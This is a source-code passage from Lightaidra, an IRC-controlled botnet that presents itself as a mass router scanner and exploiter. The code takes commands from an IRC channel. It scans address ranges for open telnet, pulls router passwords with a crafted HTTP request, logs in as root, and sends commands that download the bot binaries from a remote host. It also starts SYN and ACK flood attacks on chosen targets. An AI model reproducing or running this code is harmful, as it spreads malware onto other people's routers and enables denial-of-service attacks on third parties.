req->rcv_se); 361 | } 362 | else { 363 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16", 364 | req->rcv_sb, req->rcv_sc); 365 | } 366 | 367 | max_pids = 1; 368 | pid = fork(); 369 | 370 | if (!pid) { 371 | signal(SIGKILL, sigkill); 372 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 373 | sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..\n", 374 | channel, req->rcv_sb, req->rcv_sc, req->rcv_sd, req->rcv_se); 375 | cmd_scan_central(sp, req, 1); 376 | } 377 | else { 378 | sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..\n", 379 | channel, req->rcv_sb, req->rcv_sc); 380 | cmd_scan_central(sp, req, 2); 381 | } 382 | } 383 | else { 384 | g_pid = pid; 385 | } 386 | 387 | return EXIT_SUCCESS; 388 | } 389 | 390 | /* cmd_advscan_recursive(sock_t *, requests_t *) */ 391 | /* start the advance scanner in advscanrcs mode. */ 392 | int cmd_advscan_recursive(sock_t *sp, requests_t *req) { 393 | if (strcmp(req->rcv_sb, ":.advscan->recursive") == 0) { 394 | if (strlen(req->rcv_sc) && strlen(req->rcv_sd)) { 395 | memset(req->rcv_sb, 0, sizeof(req->rcv_sb)); 396 | 397 | if (parse_input_errors(sp, req, 3, 1)) return EXIT_FAILURE; 398 | 399 | snprintf(req->rcv_se, sizeof(req->rcv_se), "%s", req->rcv_sd); 400 | snprintf(req->rcv_sd, sizeof(req->rcv_sd), "%s", req->rcv_sc); 401 | } 402 | } 403 | else if (strlen(req->rcv_sb) && strlen(req->rcv_sc)) { 404 | snprintf(req->rcv_se, sizeof(req->rcv_se), "%s", req->rcv_sc); 405 | snprintf(req->rcv_sd, sizeof(req->rcv_sd), "%s", req->rcv_sb); 406 | 407 | if (parse_input_errors(sp, req, 2, 1)) return EXIT_FAILURE; 408 | 409 | memset(req->rcv_sb, 0, sizeof req->rcv_sb); 410 | } 411 | 412 | if (getextip(sp, req) == true) { 413 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 414 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)", 415 | req->rcv_sb, req->rcv_sc, req->rcv_sd, req->rcv_se); 416 | } 417 | else { 418 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16", 419 | req->rcv_sb, req->rcv_sc); 420 | } 421 | 422 | max_pids = 1; 423 | pid = fork(); 424 | 425 | if (!pid) { 426 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 427 | sockwrite(sp->sockfd, 428 | "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..\n", 429 | channel, req->rcv_sb, req->rcv_sc, req->rcv_sd, req->rcv_se); 430 | cmd_scan_central(sp, req, 1); 431 | } 432 | else { 433 | sockwrite(sp->sockfd, 434 | "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..\n", 435 | channel, req->rcv_sb, req->rcv_sc); 436 | cmd_scan_central(sp, req, 2); 437 | } 438 | } 439 | else { 440 | g_pid = pid; 441 | } 442 | } 443 | 444 | return EXIT_SUCCESS; 445 | } 446 | 447 | /* cmd_advscan_random(sock_t *, requests_t *) */ 448 | /* start the advance scanner in x.B.x.x random mode. */ 449 | int cmd_advscan_random(sock_t *sp, requests_t *req, int t) { 450 | /* check for input errors */ 451 | if (!strcmp(req->rcv_sb, ":.advscan->random") || 452 | !strcmp(req->rcv_sb, ":.advscan->random->b")) { 453 | 454 | if (strlen(req->rcv_sc) && strlen(req->rcv_sd)) { 455 | memset(req->rcv_sb, 0, sizeof(req->rcv_sb)); 456 | 457 | if (parse_input_errors(sp, req, 3, 1)) return EXIT_FAILURE;; 458 | 459 | snprintf(req->rcv_se, sizeof(req->rcv_se), "%s", req->rcv_sd); 460 | snprintf(req->rcv_sd, sizeof(req->rcv_sd), "%s", req->rcv_sc); 461 | } 462 | } 463 | else if (strlen(req->rcv_sb) && strlen(req->rcv_sc)) { 464 | snprintf(req->rcv_se, sizeof(req->rcv_se), "%s", req->rcv_sc); 465 | snprintf(req->rcv_sd, sizeof(req->rcv_sd), "%s", req->rcv_sb); 466 | 467 | if (parse_input_errors(sp, req, 2, 1)) return EXIT_FAILURE; 468 | 469 | memset(req->rcv_sb, 0, sizeof req->rcv_sb); 470 | } 471 | 472 | srand((unsigned int)time(NULL)); 473 | random_ct = rand(); 474 | random_num = ((random_ct % 254) + 1); 475 | 476 | if (!t) { 477 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 478 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)", 479 | req->rcv_sb, req->rcv_sc, req->rcv_sd, req->rcv_se); 480 | } 481 | else { 482 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16", 483 | req->rcv_sb, req->rcv_sc); 484 | } 485 | 486 | max_pids = 1; 487 | pid = fork(); 488 | 489 | if (!pid) { 490 | snprintf(req->rcv_sb, sizeof(req->rcv_sb), "%u", random_num); 491 | sleep(1); 492 | 493 | random_ct = rand(); 494 | random_num = ((random_ct % 254) + 1); 495 | snprintf(req->rcv_sc, sizeof(req->rcv_sc), "%u", random_num); 496 | 497 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 498 | sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..\n", 499 | channel, req->rcv_sb, req->rcv_sc, req->rcv_sd, req->rcv_se); 500 | cmd_scan_central(sp, req, 1); 501 | } 502 | else { 503 | sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..\n", 504 | channel, req->rcv_sb, req->rcv_sc); 505 | cmd_scan_central(sp, req, 2); 506 | } 507 | } 508 | else { 509 | g_pid = pid; 510 | } 511 | } 512 | else { 513 | if (!getextip(sp, req)) { 514 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 515 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)", 516 | req->rcv_sb, req->rcv_sc, req->rcv_sd, req->rcv_se); 517 | } 518 | else { 519 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16", 520 | req->rcv_sb, req->rcv_sc); 521 | } 522 | 523 | max_pids = 1; 524 | pid = fork(); 525 | 526 | if (!pid) { 527 | snprintf(req->rcv_sc, sizeof(req->rcv_sc), "%u", random_num); 528 | 529 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 530 | sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..\n", channel, 531 | req->rcv_sb, req->rcv_sc, 532 | req->rcv_sd, req->rcv_se); 533 | cmd_scan_central(sp, req, 1); 534 | } 535 | else { 536 | sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..\n", channel, 537 | req->rcv_sb, req->rcv_sc); 538 | cmd_scan_central(sp, req, 2); 539 | } 540 | } 541 | else { 542 | g_pid = pid; 543 | } 544 | } 545 | else { 546 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to get local ip, switching to random scan..\n", channel); 547 | cmd_advscan_random(sp, req, 0); 548 | } 549 | } 550 | 551 | return EXIT_SUCCESS; 552 | } 553 | 554 | /* cmd_stop(sock_t *) */ 555 | /* stop the current working. */ 556 | void cmd_stop(sock_t *sp) { 557 | if (max_pids > 0) { 558 | sockwrite(sp->sockfd, "PRIVMSG %s :[stop] %s was stopped!\n", channel, "operation"); 559 | stop = 1; 560 | max_pids = 0; 561 | kill(g_pid, 9); 562 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 563 | } 564 | 565 | return; 566 | } 567 | 568 | /* cmd_setchan(sock_t *, requests_t *) */ 569 | /* set new channel master. */ 570 | void cmd_setchan(sock_t *sp, requests_t *req) { 571 | if (strlen(req->rcv_sb) > 1) { 572 | snprintf(channel, sizeof(channel)-1, "%s", req->rcv_sb); 573 | sockwrite(sp->sockfd, "PRIVMSG %s :[chan] %s setted as master channel.\n", channel, req->rcv_sb); 574 | } 575 | 576 | return; 577 | } 578 | 579 | /* cmd_join(sock_t *, requests_t *) */ 580 | /* join bot in some channel. */ 581 | void cmd_join(sock_t *sp, requests_t *req) { 582 | if (strlen(req->rcv_sb) > 0) { 583 | stop = 0; 584 | sockwrite(sp->sockfd, "JOIN %s :%s\n", req->rcv_sb, req->rcv_sc); 585 | } 586 | 587 | return; 588 | } 589 | 590 | /* cmd_part(sock_t *, requests_t *) */ 591 | /* part bot from some channel. */ 592 | void cmd_part(sock_t *sp, requests_t *req) { 593 | if (strlen(req->rcv_sb) > 0) sockwrite(sp->sockfd, "PART %s :%s\n", req->rcv_sb, "Aidra?!"); 594 | return; 595 | } 596 | 597 | /* cmd_quit(sock_t *, requests_t *) */ 598 | /* quit from irc and kill current process. */ 599 | void cmd_quit(sock_t *sp, requests_t *req) { 600 | sockwrite(sp->sockfd, "QUIT :pwn!\n"); 601 | 602 | if (max_pids > 0) { 603 | fclose(resfd); 604 | kill(g_pid, 9); 605 | } 606 | 607 | free(sp); 608 | free(req); 609 | kill(0, 9); 610 | exit(EXIT_SUCCESS); 611 | } 612 | 613 | /* *cmd_synflood(sock_t *, requests_t *) */ 614 | /* start synflood attack. */ 615 | int cmd_packeting(sock_t *sp, requests_t *req) { 616 | if (strlen(req->rcv_sb) < 1) return EXIT_FAILURE; 617 | 618 | if (parse_input_errors(sp, req, 3, 0)) return EXIT_FAILURE; 619 | 620 | max_pids = 1; 621 | pid = fork(); 622 | 623 | if (!pid) { 624 | dsthost = host2ip(req->rcv_sb); 625 | uport = atoi(req->rcv_sc); 626 | useconds = atoi(req->rcv_sd); 627 | 628 | if (strstr(req->rcv_sa, ":.synflood")) { 629 | snprintf(status_temp, sizeof(status_temp), "synflood packeting %s:%u (secs: %u)", req->rcv_sb, uport, useconds); 630 | sockwrite(sp->sockfd, "PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).\n", channel, req->rcv_sb, uport, useconds); 631 | synflood(sp, dsthost, uport, useconds); 632 | } 633 | else if (strstr(req->rcv_sa, ":.ngsynflood")) { 634 | snprintf(status_temp, sizeof(status_temp), "ngsynflood packeting %s:%u (secs: %u)", req->rcv_sb, uport, useconds); 635 | sockwrite(sp->sockfd, "PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).\n", channel, req->rcv_sb, uport, useconds); 636 | ngsynflood(sp, dsthost, uport, useconds); 637 | } 638 | else if (strstr(req->rcv_sa, ":.ackflood")) { 639 | snprintf(status_temp, sizeof(status_temp), "ackflood packeting %s:%u (secs: %u)", req->rcv_sb, uport, useconds); 640 | sockwrite(sp->sockfd, "PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).\n", channel, req->rcv_sb, uport, useconds); 641 | ackflood(sp, dsthost, uport, useconds); 642 | } 643 | else if (strstr(req->rcv_sa, ":.ngackflood")) { 644 | snprintf(status_temp, sizeof(status_temp), "ngackflood packeting %s:%u (secs: %u)", req->rcv_sb, uport, useconds); 645 | sockwrite(sp->sockfd, "PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).\n", channel, req->rcv_sb, uport, useconds); 646 | ngackflood(sp, dsthost, uport, useconds); 647 | } 648 | } 649 | else { 650 | g_pid = pid; 651 | } 652 | 653 | return EXIT_SUCCESS; 654 | } 655 | 656 | -------------------------------------------------------------------------------- /source/scan.c: -------------------------------------------------------------------------------- 1 | /* 2 | * scan.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | int sockwrite(int sd, const char *fmt, ...); 17 | int cmd_advscan_getpass(sock_t *scan_sp); 18 | void *scan_address(scan_data_t *scan_data); 19 | int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req, 20 | unsigned short type); 21 | int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req, 22 | unsigned short type); 23 | 24 | /* cmd_scan_central(sock_t *, requests_t *, unsigned short) */ 25 | /* start scanner with vuln type. */ 26 | void cmd_scan_central(sock_t *sp, requests_t *req, unsigned short type) { 27 | unsigned short a, b, c; 28 | int i, x; 29 | pthread_t pthds[maxthreads]; 30 | scan_data_t scan_data[maxthreads]; 31 | 32 | total = 0; 33 | founds = 0; 34 | c = 0; 35 | 36 | sleep(2); 37 | remove(result_file); 38 | resfd = fopen(result_file, "a+"); 39 | 40 | if (resfd == NULL) { 41 | sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n", channel, result_file); 42 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 43 | exit(EXIT_FAILURE); 44 | } 45 | 46 | memset(hosts, 0, sizeof hosts); 47 | 48 | for (a = 0; a <= 255; a++) { 49 | for (b = 0; b <= 255; b++) { 50 | snprintf(hosts[c], sizeof(hosts[c]), "%s.%s.%d.%d", req->rcv_sb, req->rcv_sc, a, b); 51 | c++; 52 | } 53 | } 54 | 55 | for (i = 0; i <= maxhosts;) { 56 | if (strlen(hosts[i]) < 7) break; 57 | 58 | for (x = 0; x < maxthreads; x++, i++) { 59 | if (strlen(hosts[i]) < 7) break; 60 | 61 | memset(scan_data[x].hostname, 0, sizeof(scan_data[x].hostname)); 62 | snprintf(scan_data[x].hostname, 31, "%s", hosts[i]); 63 | 64 | if (pthread_create(&pthds[x], NULL, (void *)&scan_address, (scan_data_t *) & scan_data[x]) != 0) { 65 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n", channel); 66 | goto crash; 67 | } 68 | } 69 | 70 | for (x = 0; x < maxthreads; x++) { 71 | if (strlen(hosts[i]) < 7) break; 72 | 73 | if (pthread_join(pthds[x], NULL) != 0) { 74 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n", channel); 75 | goto crash; 76 | } 77 | } 78 | } 79 | 80 | crash: 81 | 82 | if (!total) { 83 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips..\n", channel, total); 84 | exit(EXIT_SUCCESS); 85 | } 86 | else { 87 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..\n", channel, total); 88 | } 89 | 90 | if ((resfd = fopen(result_file, "r+")) == NULL) { 91 | sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n", channel, result_file); 92 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 93 | exit(EXIT_FAILURE); 94 | } 95 | 96 | while (fgets(resbuf, sizeof(resbuf) - 1, resfd) != NULL) { 97 | sscanf(resbuf, "%16s", restag); 98 | 99 | if (cmd_advscan_control(restag, sp, req, type) == 0) { 100 | if (all_messages) { 101 | if (type == 1) { 102 | sockwrite(sp->sockfd, "PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!\n", 103 | channel, restag, req->rcv_sd, req->rcv_se); 104 | } 105 | else if (type == 2) { 106 | strncpy(psw_y, psw_x, strlen(psw_x) - 2); 107 | sockwrite(sp->sockfd, "PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!\n", 108 | channel, restag, psw_y); 109 | } 110 | } 111 | } 112 | 113 | memset(restag, 0, sizeof restag); 114 | } 115 | 116 | fclose(resfd); 117 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 118 | 119 | exit(EXIT_FAILURE); 120 | } 121 | 122 | /* scan_address(scan_data_t *) */ 123 | /* start addresses scanner. */ 124 | void *scan_address(scan_data_t *scan_data) { 125 | FILE *rfd; 126 | int retv, flags; 127 | fd_set rd, wr; 128 | char temp[128]; 129 | sock_t *scan_isp; 130 | 131 | scan_isp = (sock_t *) malloc(sizeof(sock_t)); 132 | 133 | if (!(scan_isp->sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP))) pthread_exit(NULL); 134 | 135 | memset(temp, 0, sizeof temp); 136 | memset(&scan_isp->sockadr, 0, sizeof scan_isp->sockadr); 137 | scan_isp->sockadr.sin_port = htons(telnet_port); 138 | scan_isp->sockadr.sin_family = AF_INET; 139 | 140 | timeout_value = 1; 141 | tm.tv_sec = timeout_value; 142 | tm.tv_usec = 500000; 143 | 144 | if (!inet_aton((const char *)scan_data->hostname, (struct in_addr *)&scan_isp->sockadr.sin_addr)) { 145 | close(scan_isp->sockfd); 146 | free(scan_isp); 147 | pthread_exit(NULL); 148 | } 149 | 150 | flags = fcntl(scan_isp->sockfd, F_GETFL, 0); 151 | 152 | if (fcntl(scan_isp->sockfd, F_SETFL, O_NONBLOCK) == false) { 153 | close(scan_isp->sockfd); 154 | free(scan_isp); 155 | pthread_exit(NULL); 156 | } 157 | 158 | if (connect(scan_isp->sockfd, (struct sockaddr *)&scan_isp->sockadr, sizeof(scan_isp->sockadr)) == -1) { 159 | if (errno != EINPROGRESS) { 160 | close(scan_isp->sockfd); 161 | free(scan_isp); 162 | pthread_exit(NULL); 163 | } 164 | } 165 | 166 | FD_SET(scan_isp->sockfd, &wr); 167 | 168 | if (!(retv = select(scan_isp->sockfd + 1, NULL, &wr, NULL, &tm))) { 169 | close(scan_isp->sockfd); 170 | free(scan_isp); 171 | pthread_exit(NULL); 172 | } 173 | else if (retv == false) { 174 | close(scan_isp->sockfd); 175 | free(scan_isp); 176 | pthread_exit(NULL); 177 | } 178 | 179 | if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) { 180 | close(scan_isp->sockfd); 181 | free(scan_isp); 182 | pthread_exit(NULL); 183 | } 184 | 185 | if (errno != EWOULDBLOCK) { 186 | close(scan_isp->sockfd); 187 | free(scan_isp); 188 | pthread_exit(NULL); 189 | } 190 | 191 | FD_SET(scan_isp->sockfd, &rd); 192 | 193 | if (!(retv = select(scan_isp->sockfd + 1, &rd, NULL, NULL, &tm))) { 194 | close(scan_isp->sockfd); 195 | free(scan_isp); 196 | pthread_exit(NULL); 197 | } 198 | else if (retv == -1) { 199 | close(scan_isp->sockfd); 200 | free(scan_isp); 201 | pthread_exit(NULL); 202 | } 203 | else { 204 | if ((fcntl(scan_isp->sockfd, F_SETFL, flags)) == false) { 205 | close(scan_isp->sockfd); 206 | free(scan_isp); 207 | pthread_exit(NULL); 208 | } 209 | 210 | if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) { 211 | rfd = fopen(result_file, "a+"); 212 | 213 | if (rfd != NULL) { 214 | fprintf(rfd, "%s\n", scan_data->hostname); 215 | fflush(rfd); 216 | fclose(rfd); 217 | total++; 218 | } 219 | } 220 | } 221 | 222 | close(scan_isp->sockfd); 223 | free(scan_isp); 224 | 225 | pthread_exit(NULL); 226 | } 227 | 228 | /* __alarm() */ 229 | /* for socket timeout. */ 230 | void __alarm() { 231 | close(scan_sp->sockfd); 232 | return; 233 | } 234 | 235 | /* cmd_advscan_control(char *, sock_t *, requests_t *) */ 236 | /* advance scanner init. */ 237 | int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req, unsigned short type) { 238 | if (type == 1) { 239 | if (cmd_advscan_join(addr, sp, req, 1) == true) { 240 | founds++; 241 | return EXIT_SUCCESS; 242 | } 243 | else { 244 | return EXIT_FAILURE; 245 | } 246 | } 247 | else if (type == 2) { 248 | scan_sp = (sock_t *) malloc(sizeof(sock_t)); 249 | scan_sp->sockhs = gethostbyname(addr); 250 | scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0); 251 | scan_sp->sockadr.sin_family = AF_INET; 252 | scan_sp->sockadr.sin_port = htons(http_port); 253 | scan_sp->sockadr.sin_addr = *((struct in_addr *)scan_sp->sockhs->h_addr); 254 | memset(scan_sp->sockadr.sin_zero, '\0', sizeof scan_sp->sockadr.sin_zero); 255 | 256 | timeout_value = 1; 257 | tm.tv_sec = timeout_value; 258 | tm.tv_usec = 500000; 259 | 260 | signal(SIGALRM, __alarm); 261 | alarm(timeout_value); 262 | 263 | if (connect(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr, sizeof scan_sp->sockadr) == false) { 264 | alarm(0); 265 | signal(SIGALRM, SIG_DFL); 266 | free(scan_sp); 267 | return EXIT_FAILURE; 268 | } 269 | 270 | if (cmd_advscan_getpass(scan_sp) == true) { 271 | close(scan_sp->sockfd); 272 | free(scan_sp); 273 | 274 | if (cmd_advscan_join(addr, sp, req, 2) == true) { 275 | founds++; 276 | return EXIT_SUCCESS; 277 | } 278 | else { 279 | return EXIT_FAILURE; 280 | } 281 | } 282 | } 283 | 284 | close(scan_sp->sockfd); 285 | free(scan_sp); 286 | 287 | return EXIT_FAILURE; 288 | } 289 | 290 | /* cmd_advscan_getpass(sock_t *) */ 291 | /* advance scanner password finder. */ 292 | int cmd_advscan_getpass(sock_t *scan_sp) { 293 | char temp[801]; 294 | char *one, *two; 295 | 296 | if (sockwrite(scan_sp->sockfd, post_request) == false) return EXIT_FAILURE; 297 | 298 | recv(scan_sp->sockfd, temp, 100, 0); 299 | recv(scan_sp->sockfd, temp, 800, 0); 300 | one = strtok(temp, "<"); 301 | 302 | while (one != NULL) { 303 | if (strstr(one, "password>")) { 304 | two = strtok(one, ">"); 305 | 306 | while (two != NULL) { 307 | if (strcmp(two, "password") != true) { 308 | snprintf(psw_x, strlen(two) + 3, "%s\r\n", two); 309 | return EXIT_SUCCESS; 310 | } 311 | 312 | two = strtok(NULL, ">"); 313 | } 314 | } 315 | 316 | one = strtok(NULL, "<"); 317 | } 318 | 319 | return EXIT_FAILURE; 320 | } 321 | 322 | /* cmd_advscan_join(char *, sock_t *, requests_t *) */ 323 | /* advance scanner (router validate control). */ 324 | int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req, unsigned short type) { 325 | unsigned short e = 0; 326 | 327 | scan_sp = (sock_t *) malloc(sizeof(sock_t)); 328 | scan_sp->sockhs = gethostbyname(addr); 329 | scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0); 330 | scan_sp->sockadr.sin_family = AF_INET; 331 | scan_sp->sockadr.sin_port = htons(telnet_port); 332 | 333 | scan_sp->sockadr.sin_addr = *((struct in_addr *)scan_sp->sockhs->h_addr); 334 | memset(scan_sp->sockadr.sin_zero, '\0', sizeof scan_sp->sockadr.sin_zero); 335 | 336 | timeout_value = 2; 337 | tm.tv_sec = timeout_value; 338 | tm.tv_usec = 500000; 339 | 340 | setsockopt(scan_sp->sockfd, SOL_SOCKET, SO_RCVTIMEO,(char *)&tm,sizeof(struct timeval)); 341 | 342 | /* ignore ++ KILLED BY SIGPIPE ++ */ 343 | signal(SIGPIPE, SIG_IGN); 344 | 345 | signal(SIGALRM, __alarm); 346 | alarm(timeout_value); 347 | 348 | if (connect(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr, sizeof scan_sp->sockadr) == false) { 349 | alarm(0); 350 | signal(SIGALRM, SIG_DFL); 351 | free(scan_sp); 352 | return EXIT_FAILURE; 353 | } 354 | 355 | if (type == 1) { 356 | if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_sd) == false) e++; 357 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 358 | 359 | if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_se) == false) e++; 360 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 361 | } 362 | else if (type == 2) { 363 | if (send(scan_sp->sockfd, "root\r\n", strlen("root\r\n"), MSG_NOSIGNAL) == false) e++; 364 | 365 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 366 | send(scan_sp->sockfd, psw_x, strlen(psw_x), MSG_NOSIGNAL); 367 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 368 | } 369 | 370 | if (e) { 371 | close(scan_sp->sockfd); 372 | free(scan_sp); 373 | return EXIT_FAILURE; 374 | } 375 | 376 | memset(__netbuf, 0, sizeof __netbuf); 377 | recv_bytes = recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 378 | 379 | if (recv_bytes == -1) { 380 | close(scan_sp->sockfd); 381 | free(scan_sp); 382 | return EXIT_FAILURE; 383 | } 384 | 385 | __netbuf[recv_bytes] = 0; 386 | 387 | if (strchr(__netbuf, '#') != NULL || strchr(__netbuf, '$') != NULL) { 388 | sockwrite(scan_sp->sockfd, getbinaries, reference_http); 389 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 390 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 391 | sleep(3); 392 | 393 | close(scan_sp->sockfd); 394 | free(scan_sp); 395 | return EXIT_SUCCESS; 396 | } 397 | 398 | close(scan_sp->sockfd); 399 | free(scan_sp); 400 | 401 | return EXIT_FAILURE; 402 | } 403 | -------------------------------------------------------------------------------- /source/utils.c: -------------------------------------------------------------------------------- 1 | /* 2 | * utils.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | void __alarm(); 17 | void decode(); 18 | 19 | /* daemonize(void) */ 20 | /* set Aidra in background mode. */ 21 | void daemonize() { 22 | daemonize_pid = fork(); 23 | if (daemonize_pid) exit(EXIT_SUCCESS); 24 | } 25 | 26 | /* sockwrite(int, const char *) */ 27 | /* socket send function. */ 28 | int sockwrite(int sd, const char *fmt, ...) { 29 | char s_buf[sizebuf]; 30 | va_list args; 31 | 32 | va_start(args, fmt); 33 | vsnprintf(s_buf, sizebuf - 1, fmt, args); 34 | va_end(args); 35 | 36 | if (send(sd, s_buf, strlen(s_buf), MSG_NOSIGNAL) < true) return EXIT_FAILURE; 37 | 38 | return EXIT_SUCCESS; 39 | } 40 | 41 | /* getrstr(void) */ 42 | /* return a random char string. */ 43 | char *getrstr() { 44 | char rdnick[] = { "0ab1cd2ef3gh4il5mn6op7qr8st9uvz_wyjkx" }; 45 | char nm[16]; 46 | int nc; 47 | 48 | data_ptr = (char *)malloc(15); 49 | 50 | memset(nm, 0, sizeof nm); 51 | srand(time(0)); 52 | 53 | for (nc = 0; nc < 10; nc++) { 54 | nm[nc] = rdnick[rand()%strlen(rdnick)]; 55 | } 56 | 57 | snprintf(data_ptr, 15, "%s%s", irc_nick_prefix, nm); 58 | return data_ptr; 59 | } 60 | 61 | /* wordcmp(const char *, requests_t *) */ 62 | /* a menu strncmp function. */ 63 | int wordcmp(const char *s, requests_t *req) { 64 | if (strlen(req->rcv_sa)) { 65 | if (strncmp(req->rcv_sa, s, strlen(s)) == true && strlen(req->rcv_sa) == strlen(s)) 66 | return EXIT_SUCCESS; 67 | } 68 | 69 | return EXIT_FAILURE; 70 | } 71 | 72 | /* wordcmp(const char *, requests_t *) */ 73 | /* a menu strncmp function. */ 74 | int wordcmpp(const char *s, requests_t *req) { 75 | if (strlen(req->rcv_sa) == strlen(s)+1) { 76 | if (strcmp(req->rcv_sa, s)) return EXIT_SUCCESS; 77 | } 78 | 79 | return EXIT_FAILURE; 80 | } 81 | 82 | /* twordcmp(const char *, requests_t *) */ 83 | /* a topic strncmp function. */ 84 | int twordcmp(const char *s, requests_t *req) { 85 | if (strncmp(s, req->rcv_sb, strlen(s)) == true) return EXIT_SUCCESS; 86 | return EXIT_FAILURE; 87 | } 88 | 89 | /* login(sock_t *, requests_t *) */ 90 | /* log in party-line bot. */ 91 | int login(sock_t *sp, requests_t *req) { 92 | if (strstr(req->rcv_a, master_host)) { 93 | if (strncmp(master_password, req->rcv_sb, strlen(master_password)) == true) { 94 | sockwrite(sp->sockfd, "PRIVMSG %s :[login] you are logged in, (%s).\n", channel, req->rcv_a + 1); 95 | return EXIT_SUCCESS; 96 | } 97 | else { 98 | sockwrite(sp->sockfd, "PRIVMSG %s :[!login] sorry, wrong authenthication password!\n", channel); 99 | } 100 | } 101 | 102 | return EXIT_FAILURE; 103 | } 104 | 105 | /* login_control(requests_t *) */ 106 | /* check if user is logged in. */ 107 | int login_control(requests_t *req) { 108 | if (strstr(req->rcv_a, master_host)) return EXIT_SUCCESS; 109 | 110 | return EXIT_FAILURE; 111 | } 112 | 113 | /* getextip(sock_t *, requests_t *) */ 114 | /* get extern ip address. */ 115 | int getextip(sock_t *sp, requests_t *req) { 116 | int a, b, x = 0; 117 | char temp[512], *tok; 118 | sock_t *gfd; 119 | 120 | gfd = (sock_t *) malloc(sizeof(sock_t)); 121 | gfd->sockhs = gethostbyname(ipreq); 122 | gfd->sockfd = socket(AF_INET, SOCK_STREAM, 0); 123 | gfd->sockadr.sin_family = AF_INET; 124 | gfd->sockadr.sin_port = htons(http_port); 125 | 126 | gfd->sockadr.sin_addr = *((struct in_addr *)gfd->sockhs->h_addr); 127 | 128 | memset(gfd->sockadr.sin_zero, '\0', sizeof gfd->sockadr.sin_zero); 129 | 130 | if (connect(gfd->sockfd, (struct sockaddr *)&gfd->sockadr, sizeof gfd->sockadr) == false) { 131 